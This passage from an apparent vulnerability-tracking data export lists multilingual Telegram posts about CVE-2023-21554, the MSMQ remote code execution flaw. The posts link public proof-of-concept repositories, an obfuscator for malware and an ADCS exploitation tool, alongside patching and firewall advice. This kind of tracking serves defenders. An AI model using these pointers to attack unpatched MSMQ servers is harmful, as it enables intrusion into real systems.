\u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u044c \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u0439 \u043f\u0430\u043a\u0435\u0442 \u0441\u0435\u0440\u0432\u0438\u0441\u0443 \u0437\u0430\u043f\u0443\u0449\u0435\u043d\u043d\u044b\u0439 \u043d\u0430 \u043f\u043e\u0440\u0442\u0443 1801/tcp. \u0421\u043e\u0433\u043b\u0430\u0441\u043d\u043e \u0441\u0442\u0430\u0442\u0438\u0441\u0442\u0438\u043a\u0438 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0432 \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u0435 \u043e\u043a\u043e\u043b\u043e 360,000 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 MSMQ, \u0431\u043e\u043b\u044c\u0448\u0430\u044f \u0447\u0430\u0441\u0442\u044c \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u044b \u0434\u043b\u044f CVE-2023-21554.\n\nPOC: https://github.com/omair2084/msmq_re/\n\u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438: \u041f\u0430\u0442\u0447 \u0443\u0436\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u0435\u043d, \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c\u0441\u044f \u0434\u043e \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0439 \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0438.\n\n#CVE-2023-21554 #RCE #MSMQ", "creation_timestamp": "2023-05-03T21:31:56.000000Z"}, {"uuid": "32f8d91a-bcbb-43e8-b0d1-e61a8df8d46a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/arvinclub1/15", "content": "vulnerabilities in Microsoft Message Queuing (MSMQ)\nCVE-2023-21554\nhttps://research.checkpoint.com/2023/queuejumper-critical-unauthorized-rce-vulnerability-in-msmq-service", 
"creation_timestamp": "2023-04-11T21:23:37.000000Z"}, {"uuid": "d25eb3b2-6c81-4d60-9c8c-3855b7488c27", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "seen", "source": "https://t.me/ctinow/105567", "content": "CVE-2023-21554 \u2013 Hunt For MSMQ QueueJumper In The Environment\n\nhttps://ift.tt/EmkxzFB", "creation_timestamp": "2023-04-13T16:40:20.000000Z"}, {"uuid": "df48b49c-6cea-461f-80b1-698bcbc5ee7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "Telegram/wqQyoLxmelLnJNF0GCepwyWKeo0-i9JOeIzU9jIvCkiSB7Q", "content": "", "creation_timestamp": "2025-03-31T17:00:08.000000Z"}, {"uuid": "e787bfbf-e2c0-4f15-9d78-7f462c80d35f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "seen", "source": "https://t.me/breachdetector/330080", "content": "{\n  \"Source\": \"https://www.turkhackteam.org/\",\n  \"Content\": \"CVE-2023-21554: What is MSMQ? 
(Comprehensive)\", \n  \"author\": \" ('BARBAROS)\",\n  \"Detection Date\": \"04 Sep 2023\",\n  \"Type\": \"Data leak\"\n}\n\ud83d\udd39 t.me/breachdetector \ud83d\udd39", "creation_timestamp": "2023-09-04T00:17:28.000000Z"}, {"uuid": "2e1f70c8-89e9-4030-a665-09d46097d732", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3040", "content": "Tools - Hackers Factory \n\n\u200b\u200bInvoke-GPTObfuscation\n\nA PowerShell Obfuscator that utilizes OpenAI (and other APIs) to obfuscate your PowerShell penetration testing code, malware, or any other sensitive script.\n\nhttps://github.com/hwvs/Invoke-GPTObfuscation\n\n#infosec \n\n\u200b\u200bSubreconGTP\n\nThis (VERY BETA) Python script performs AI-assisted subdomain discovery. It takes a list of subdomains as input, generates similar subdomains using the OpenAI GPT-3 model, and attempts to resolve these subdomains.\n\nhttps://github.com/jhaddix/SubreconGTP\n\n#infosec #pentesting #bugbounty\n\nHarden Windows Safely \n\nSecurely using Official Supported Microsoft methods with proper explanation | Always up-to-date and works with the latest build of Windows.\n\nhttps://github.com/HotCakeX/Harden-Windows-Security\n\n#cybersecurity #infosec\n\n\u200b\u200bxurlfind3r\n\nA CLI utility to find domain's known URLs passively from AlienVault's Open Threat Exchange, Common Crawl, Github, Intelligence X, URLScan, and the Wayback Machine.\n\nhttps://github.com/hueristiq/xurlfind3r\n\n#infosec #pentesting #bugbounty\n\n\u200b\u200bCVE-2023-21554\n\nPoC CVE-2023-21554 Windows MessageQueuing.\n\nhttps://github.com/zoemurmure/CVE-2023-21554-PoC\n\n#cve #poc #infosec\n\n\u200b\u200bLoki\n\nSimple IOC and YARA Scanner.\n\nhttps://github.com/Neo23x0/Loki\n\n#cybersecurity #infosec #malware\n\n\u200b\u200bPeExports\n\nThis simple multithreaded tool is for collecting 
PE exports to help with API hashing when reverse engineering.\n\nhttps://github.com/c3rb3ru5d3d53c/peexports\n\n#cybersecurity #infosec\n\n\u200b\u200bNoCrypt AntiRansomware Linux\n\nTool to prevent #ransomware attacks on Linux systems. The module hooks the system call\u00a0sys_rename\u00a0using ftrace to monitor all the files renamed on the system.\n\nhttps://github.com/niveb/NoCrypt\n\n#cybersecurity #infosec #ransom\n\n\u200b\u200bFnord\n\nFnord is a pattern extractor for obfuscated code.\n\nhttps://github.com/Neo23x0/Fnord\n\n#cybersecurity #infosec\n\n\u200b\u200bCritical Sandbox Escape Vulnerability in VM2\n\nA sandbox escape vulnerability exists in vm2 for versions up to 3.9.17. It abuses an unexpected creation of a host object based on the specification of Proxy, and allows RCE via Function in the host context.\n\nhttps://gist.github.com/arkark/e9f5cf5782dec8321095be3e52acf5ac\n\n#cybersecurity #infosec #poc\n\n\u200b\u200bCFG-FindHiddenShellcode\n\nWalks the CFG bitmap to find previously executable but currently hidden shellcode regions.\n\nhttps://github.com/jdu2600/CFG-FindHiddenShellcode\n\n#cybersecurity #infosec\n\n\u200b\u200bADCSKiller\n\nA Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. 
It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure.\n\nhttps://github.com/grimlockx/ADCSKiller\n\n#infosec #pentesting #redteam\n\n\u200b\u200bNavi | An SSG Community Project\n\nNavi is an interface for CLI AI programs built on 'Echo-AI' to bring together a purpose built cybersecurity #AI.\n\nhttps://github.com/SSGorg/Navi\n\n#cybersecurity #infosec\n\n\u200b\u200bCybersecurity-Books\n\nHere you will get awesome collection of mostly all well-known and usefull cybersecurity books from beginner level to expert for all cybersecurity positions.\n\nhttps://github.com/zealraj/Cybersecurity-Books\n\n#cybersecurity #infosec\n\n\u200b\u200bThreatHunting-Keywords\n\nThis List can be valuable for ThreatHunters, SOC and CERT teams for static analysis on SIEM as it assists in identifying threat actors (or redteamers \ud83d\ude06) using default configurations from renowned exploitation tools in logs. It differs from IOC feeds in its enduring relevance: the keywords here have no 'expiration dates' and can detect threats years after their inclusion, they are flexible accepting wildcard and non sensitive case matches and only focused on default keywords.\n\nhttps://github.com/mthcht/ThreatHunting-Keywords\n\n#infosec #pentesting #redteam\n\n\u200b\u200bPywerView\n\nEasy to find vulnerable machines, or list what domain users were added to the local Administrators group of a machine, and much more.\n\nhttps://github.com/the-useless-one/pywerview\n\n#infosec #pentesting #redteam\n\n\u200b\u200bhttps://t.me/dilagrafie\nhttps://t.me/HackerFactory", "creation_timestamp": "2023-05-22T14:01:30.000000Z"}, {"uuid": "7ca9439e-7326-4661-8e95-62954a7a3aaf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/1537", "content": "CVE-2023-21554\nwin message  
\u043f\u043e\u0434\u044a\u0435\u0445\u0430\u043b\u0438\nPOC\n\n#win #poc", "creation_timestamp": "2023-05-19T13:10:13.000000Z"}, {"uuid": "71b685c5-54af-40e4-90ac-6f086eb25f0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/1478", "content": "CVE-2023-21554\n\u041d\u0443\u0436\u043d\u043e \u0442\u043e\u043b\u044c\u043a\u043e \u043f\u0430\u043a\u0435\u0442\u0438\u043a \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u044c \u043d\u0430 MSMQ-\u0441\u0435\u0440\u0432\u0435\u0440 (\u0434\u0430, \u043e\u043d   \u0434\u043e\u043b\u0436\u0435\u043d \u0431\u044b\u0442\u044c \u0432\u043a\u043b\u044e\u0447\u0435\u043d) \u0438 \u043c\u043e\u0436\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c remote command\nPOC \u041f\u0430\u043a\u0435\u0442\u0438\u043a\n\n#windows", "creation_timestamp": "2023-05-02T11:23:25.000000Z"}, {"uuid": "b8a59a49-bcac-4fe2-8b81-2a08f63ffa0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "seen", "source": "https://t.me/breachdetector/327402", "content": "{\n  \"Source\": \"https://www.turkhackteam.org/\",\n  \"Content\": \"CVE-2023-21554: MSMQ Nedir ? 
(Geni\u015f Kapsaml\u0131)\", \n  \"author\": \" ('BARBAROS)\",\n  \"Detection Date\": \"31 Aug 2023\",\n  \"Type\": \"Data leak\"\n}\n\ud83d\udd39 t.me/breachdetector \ud83d\udd39", "creation_timestamp": "2023-08-31T11:47:59.000000Z"}, {"uuid": "8715f283-7249-4255-a299-1c07fc3f5955", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "Telegram/cR8wu-BOUm9IhkjBcawrMcWgWqAecxY5zIb1phwyqakf-Jc", "content": "", "creation_timestamp": "2023-05-28T15:02:00.000000Z"}, {"uuid": "587a54bb-c6e8-4022-b354-67a2dc442925", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/RespaldoHackingTeam/856", "content": "CVE-2023-21554: busque MSMQ QueueJumper en el entorno: investigaci\u00f3n de seguridad\nhttps://www.socinvestigation.com/cve-2023-21554-hunt-for-msmq-queuejumper-in-the-environment/", "creation_timestamp": "2023-04-14T05:53:02.000000Z"}, {"uuid": "5e70ace4-baab-459c-8ae0-52520b68445d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "seen", "source": "Telegram/gejFY3ElMilBssDwc1BD5BhkwcUSGiEjq7v0IREe0G5rVwQ", "content": "", "creation_timestamp": "2023-11-07T15:21:48.000000Z"}, {"uuid": "a6c7cf55-757f-4713-8e40-62acaca7505d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "seen", "source": "Telegram/95lBncFMT506qQfHU4U37SSPP7ovHw6YCW80XkCboWaqbls", "content": "", "creation_timestamp": "2023-11-07T15:21:21.000000Z"}, {"uuid": "191d9af6-0d76-4e1f-8d8d-51e7f114f121", "vulnerability_lookup_origin": 
"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "seen", "source": "Telegram/yKJ96vq1FsF1EOMPDUo9o6DnZ2JWujcOpmMAVe5roFBOHgU", "content": "", "creation_timestamp": "2023-07-11T21:27:25.000000Z"}, {"uuid": "77ef1861-99c9-4e3b-b9b8-9a01b7484aa3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "Telegram/artdXOYpoMtx65AtapuDVVsdO4HZD4JD5CRcaIZICbRvf7o", "content": "", "creation_timestamp": "2023-05-24T00:55:15.000000Z"}, {"uuid": "d8ac085d-1c88-45e8-89ae-5958ec326dbc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "exploited", "source": "https://t.me/true_secator/4284", "content": "\u0411\u043e\u043b\u0435\u0435 360 000 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0432 \u0441\u0435\u0442\u0438 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u0441 \u0437\u0430\u043f\u0443\u0449\u0435\u043d\u043d\u043e\u0439 \u0441\u043b\u0443\u0436\u0431\u043e\u0439 Windows Message Queuing (MSMQ) \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u044b \u0434\u043b\u044f \u0430\u0442\u0430\u043a, \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u043d\u044b\u0445 \u043d\u0430 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0443\u044e  CVE-2023-21554, \u043a\u043e\u0442\u043e\u0440\u0443\u044e Microsoft \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u043b\u0430 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u043c PAtchTuesday \u043d\u0430\u0440\u044f\u0434\u0443 \u0441 \u0441\u043e\u0442\u043d\u0435\u0439 \u0434\u0440\u0443\u0433\u0438\u0445.\n\n\u041e\u0431 \u043e\u0448\u0438\u0431\u043a\u0435 \u0441\u043e\u043e\u0431\u0449\u0438\u043b\u0438 
\u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0423\u044d\u0439\u043d \u041b\u043e\u0443 \u0438\u0437 FortiGuard Lab \u0438 \u0425\u0430\u0439\u0444\u0435\u0439 \u041b\u0438 \u0438\u0437 Check Point Research.\n\n\u041e\u043d\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0435\u0430\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0434\u043e\u0431\u0438\u0442\u044c\u0441\u044f RCE \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u0445 Windows, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u043f\u0430\u043a\u0435\u0442\u044b MSMQ \u0432 \u0430\u0442\u0430\u043a\u0430\u0445 \u043d\u0438\u0437\u043a\u043e\u0439 \u0441\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u0431\u0435\u0437 \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u0441 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c.\n\n\u0417\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0432\u0441\u0435 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u043c\u044b\u0435 \u0432\u044b\u043f\u0443\u0441\u043a\u0438 \u0441\u0435\u0440\u0432\u0435\u0440\u043d\u044b\u0445 \u0438 \u043a\u043b\u0438\u0435\u043d\u0442\u0441\u043a\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u0439 Windows.\n\n\u0423\u0447\u0438\u0442\u044b\u0432\u0430\u044f \u044d\u0442\u043e, \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c, \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u043d\u0430\u043c\u043d\u043e\u0433\u043e \u0431\u043e\u043b\u044c\u0448\u0435, 
\u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e \u0435\u0441\u043b\u0438 \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0442\u044c \u0432\u043e \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435, \u0447\u0442\u043e \u0441\u043b\u0443\u0436\u0431\u0430 MSMQ \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0438 \u043d\u0430 \u043d\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0447\u0435\u0440\u0435\u0437 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442 \u043c\u0430\u0448\u0438\u043d\u0430\u0445.\n\n\u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u0445\u043e\u0442\u044f \u0438 MSMQ \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043d\u0435\u043e\u0431\u044f\u0437\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u043c \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u043e\u043c Windows, \u043e\u043d\u0430 \u043e\u0431\u044b\u0447\u043d\u043e \u0432\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u0432 \u0444\u043e\u043d\u043e\u0432\u043e\u043c \u0440\u0435\u0436\u0438\u043c\u0435 \u043f\u0440\u0438 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0435 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0445 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439 \u0438 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u0442 \u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c \u0434\u0430\u0436\u0435 \u043f\u043e\u0441\u043b\u0435 \u0443\u0434\u0430\u043b\u0435\u043d\u0438\u044f \u041f\u041e \u0441\u043e \u0432\u0441\u0435\u043c\u0438 \u0432\u044b\u0442\u0435\u043a\u0430\u044e\u0449\u0438\u043c\u0438 \u043f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u044f\u043c\u0438.\n\n\u041a \u043f\u0440\u0438\u043c\u0435\u0440\u0443, \u0432 \u0441\u043b\u0443\u0447\u0430\u0435 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 Exchange Server.\n\n\u041d\u0430 \u0444\u043e\u043d\u0435 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0435\u0433\u043e \u043e\u043f\u044b\u0442\u0430 \u0430\u0442\u0430\u043a 
\u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u044d\u0442\u043e\u0433\u043e \u0442\u0438\u043f\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a \u043f\u043e\u043c\u0435\u0442\u0438\u043b CVE-2023-21554 \u0442\u0435\u0433\u043e\u043c \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438. \u0422\u0435\u043c \u0432\u0440\u0435\u043c\u0435\u043d\u0435\u043c, GreyNoise \u0443\u0436\u0435 \u0444\u0438\u043a\u0441\u0438\u0440\u0443\u0435\u0442 \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u0441 Windows MSMQ.\n\nMicrosoft \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u0435\u0442 \u0438 \u0441\u043e\u0432\u0435\u0442\u0443\u0435\u0442 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043d\u0435 \u043c\u043e\u0433\u0443\u0442 \u0440\u0430\u0437\u0432\u0435\u0440\u043d\u0443\u0442\u044c \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435, \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u0441\u043b\u0443\u0436\u0431\u0443 Windows MSMQ (\u0435\u0441\u043b\u0438 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e) \u0434\u043b\u044f \u0438\u0441\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f \u0432\u0435\u043a\u0442\u043e\u0440\u0430 \u0430\u0442\u0430\u043a\u0438.\n\n\u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u0446\u0435\u043b\u0435\u0441\u043e\u043e\u0431\u0440\u0430\u0437\u043d\u043e  \u0437\u0430\u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f 1801/TCP \u0438\u0437 \u043d\u0435\u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0445 
\u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u043e\u0432 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043f\u0440\u0430\u0432\u0438\u043b \u0431\u0440\u0430\u043d\u0434\u043c\u0430\u0443\u044d\u0440\u0430.", "creation_timestamp": "2023-04-13T16:20:05.000000Z"}, {"uuid": "6994a04b-ab89-4140-9451-fd90b4cba95b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/MrVGunz/1067", "content": "CVE-2023-21554: \u0627\u062c\u0631\u0627\u06cc \u06a9\u062f \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 \u062f\u0631 \u0635\u0641 \u067e\u06cc\u0627\u0645 Microsoft\nPOC: https://github.com/zoemurmure/CVE-2023-21554-PoC\nPOC: https://github.com/3tternp/CVE-2023-21554\nMSRC: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21554\n\nCVE-2023-21554 : Microsoft Message Queuing Remote Code Execution\nPOC : https://github.com/zoemurmure/CVE-2023-21554-PoC\nPOC : https://github.com/3tternp/CVE-2023-21554\nMSRC : https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21554", "creation_timestamp": "2024-05-05T12:33:37.000000Z"}, {"uuid": "c29d8317-6af1-40c2-90fc-c4bd887a6d5b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/jokerplstaeen/17317", "content": "\u200b\u200bCVE-2023-21554\n\nPoC CVE-2023-21554 Windows MessageQueuing.\n\nhttps://github.com/zoemurmure/CVE-2023-21554-PoC\n\n#cve #poc #infosec", "creation_timestamp": "2023-05-23T17:57:17.000000Z"}, {"uuid": "0857497b-14be-471b-bacc-facde931ef0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": 
"https://t.me/reverse_dungeon/3101", "content": "Windows Message Queuing RCE, CVE-2023-21554:\nhttps://www.zoemurmure.top/posts/cve_2023_21554/\nPoC: https://github.com/zoemurmure/CVE-2023-21554-PoC", "creation_timestamp": "2023-05-22T18:00:17.000000Z"}, {"uuid": "e77d2983-82f4-44fc-98c8-77255b056fca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/crackcodes/3523", "content": "CVE-2023-21554 Windows MessageQueuing PoC\n\nDownload", "creation_timestamp": "2023-05-19T17:11:51.000000Z"}, {"uuid": "60b720c5-9fe3-4b8a-b0ce-127f8883fd95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/8177", "content": "#exploit\n1. CVE-2023-1671:\nPre-Auth RCE in Sophos Web Appliance\nhttps://vulncheck.com/blog/cve-2023-1671-analysis\n]-> https://github.com/W01fh4cker/CVE-2023-1671-POC\n\n2. CVE-2022-29844:\nBuffer Overflow On WD My Cloud Pro Series PR4100\nhttps://www.zerodayinitiative.com/blog/2023/4/19/cve-2022-29844-a-classic-buffer-overflow-on-the-western-digital-my-cloud-pro-series-pr4100\n\n3. CVE-2023-21554:\nUnauthenticated RCE vulnerability in the MSMQ service\nhttps://www.randori.com/blog/vulnerability-analysis-queuejumper-cve-2023-21554", "creation_timestamp": "2024-07-17T00:33:01.000000Z"}]}